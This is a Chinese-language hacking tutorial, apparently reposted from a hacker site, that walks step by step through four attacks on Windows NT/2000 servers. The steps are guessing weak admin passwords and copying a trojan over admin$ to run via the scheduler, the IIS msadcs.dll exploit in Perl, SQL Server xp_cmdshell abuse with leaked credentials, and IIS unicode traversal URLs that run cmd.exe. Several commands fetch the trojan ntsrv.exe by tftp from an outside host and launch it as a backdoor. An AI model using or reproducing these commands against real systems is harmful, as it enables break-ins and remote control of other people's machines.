对WindowsNT发起攻击，这里要用几个软件。我的系统是WIN2000，还有PERL，头发TFTP TURB98，TWWWSCAN0.6，NEWLETMEIN，NETBUS1.7（木马），MSSQL7 ,netsvc.exe。

所有对NT的攻击都是因为管理员的懒惰，可能是懒的改密码，懒的升级，懒得打补丁……这里我就说说我曾用过的4个比较普遍的大漏洞。

1、开了共享，而且ADMINISTRATORS组密码简单要不是空，要不是和用户名一样。对于这样的傻瓜管理员，攻击变的简单。在WIN2000的命令提示符下这样输入：

c:\>newletmein xxx.xxx.xxx.xxx -all -g

c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN"

c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32

c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32

c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start

c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg

2、目标开了WEB服务，IIS有漏洞msadcs.dll漏洞，这个漏洞可以用TWWWSCAN扫描到，为了确认这个漏洞，你可以在浏览器的网址栏里输入这个文件的具体路径来确认，IE将显示application/x_varg，说明这个漏洞存在，然后在PERL下，进行攻击：

C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx 
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c

一般这里我用TFTP上传我的木马文件，但首先你得先设置好你的TFTP主机

tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe

这里61.137.157.156是我的TFTP主机，TFTP目录下有NTSRV.EXE木马。如果程序执行成功，TFTP会显示文件传输的进度，然后再执行PERL，将木马激活，你再用木马连上对方的机器，搞定。

3、目标开了WEB服务，而且有SQL服务，一般SQL服务器开1433端口，如果WEB服务器用ASP等等。你如果能看到ASP或者GLOBAL.ASA的原码，而且把用户名或者密码写在这里，你已经差不多搞定啦。

打开SQL SERVER 7.0 在client network uitlity里输入对方IP，通讯选TCP/IP，端口选1433，然后应用确定，再打开query analyzer SERVER选你要攻击的IP，用户名和密码输入，连接他，等会，连上。在上面这样输入：

create proc #1 as exec master..xp_cmdshell''dir c:\''
go
exec #1

4、目标开了WEB服务，IIS有漏洞，这里要说现在比较普遍的双字节编码漏洞。理论这里不说，也说不好，照着干就可以。发现目标XXX.XXX.XXX.XXX，在浏览器里输入

http://xxx.xxx.xxx.xxx/.idq

http://xxx.xxx.xxx.xxx/scripts/. ... em32/cmd.exe?/c+dir

http://xxx.xxx.xxx.xxx/scripts/. ... m32/cmd.exe?/c+tftp
 -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe

http://xxx.xxx.xxx.xxx/scripts/. ... tem32/cmd.exe?/c+c:\winnt\system32\ntsrv.exe

木马被启动，用木马连上，搞定。但是权限可能不是管理员，有办法成为管理员，等以后再说吧！可能有的细节和你实践不一样，具体问题具体对待！http://www.hacker.cn/News/xtaq/2007-1/24/0712408241487809_2.shtml